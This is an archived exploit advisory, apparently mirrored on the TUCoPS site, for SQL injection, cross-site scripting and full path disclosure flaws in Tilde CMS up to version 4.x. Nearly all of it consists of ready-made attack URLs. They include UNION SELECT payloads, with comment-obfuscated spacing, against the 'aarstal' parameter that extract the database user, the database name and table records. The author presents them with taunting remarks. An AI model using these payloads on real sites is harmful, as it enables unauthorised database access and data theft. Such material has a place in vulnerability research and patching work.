Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: tb13584.htm

Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection



Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection
Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection



---------------------------------------------------------------=0D
 ____            __________         __             ____  __   =0D
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ =0D
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\=0D
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  =0D
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  =0D
          \/\______|      \/     \/                         =0D
---------------------------------------------------------------=0D
=0D
Http://www.inj3ct-it.org 	 Staff[at]inj3ct-it[dot]org =0D 
=0D
---------------------------------------------------------------=0D
=0D
Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection=0D
=0D
---------------------------------------------------------------=0D
=0D
#By KiNgOfThEwOrLd				=0D
=0D
---------------------------------------------------------------=0D
PoC=0D
=0D
D'u need an explanation?!? i don't think so :P=0D
---------------------------------------------------------------=0D
SQL Injection=0D
=0D
http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=%27=0D 
=0D
Little examples=0D
=0D
Using user() and database() functions u can get some informations about the database...as:=0D
=0D
http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/*=0D 
=0D
Or u can get some recordes by the database like:=0D
=0D
http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name]/**/from/**/[table_name]/*=0D 
=0D
D'u want the tables n' the rows? Find it yourself ;P=0D
---------------------------------------------------------------=0D
something else..=0D
=0D
Xss Vulnerability=0D
=0D
http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=[XSS]=0D 
---------------------------------------------------------------=0D
Full Path Disclosure=0D
=0D
http://[target]/[tilde_path]/index.php?search=%3C&mode=search&sider=on&tss=on&linier=on=0D 
---------------------------------------------------------------=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH